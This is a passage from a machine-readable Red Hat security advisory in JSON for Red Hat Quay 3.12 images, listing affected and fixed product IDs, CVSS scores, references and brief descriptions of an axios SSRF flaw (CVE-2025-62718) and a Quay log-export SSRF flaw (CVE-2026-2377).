          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456913",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456913"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-62718",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1",
          "url": "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2",
          "url": "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df",
          "url": "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10661",
          "url": "https://github.com/axios/axios/pull/10661"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"
        }
      ],
      "release_date": "2026-04-09T14:31:46.067000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-2377",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-02-11T21:02:44.495000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2439201"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application\u0027s internal network, potentially leading to the disclosure of sensitive information.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Due to the intended and supported use case of Openshift Mirror Registry, deployment in an offline or network-isolated environment, the impact for this product has been downgraded to `Moderate`.\n\nEven in case of compromise, the blast radius is restricted to mirror-registry. It can not be escalated outside the core product. This vulnerability has been scored based on the lack of change of scope.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "RHBZ#2439201",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439201"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-2377",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377"
        }
      ],
      "release_date": "2026-04-08T16:18:10.324000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
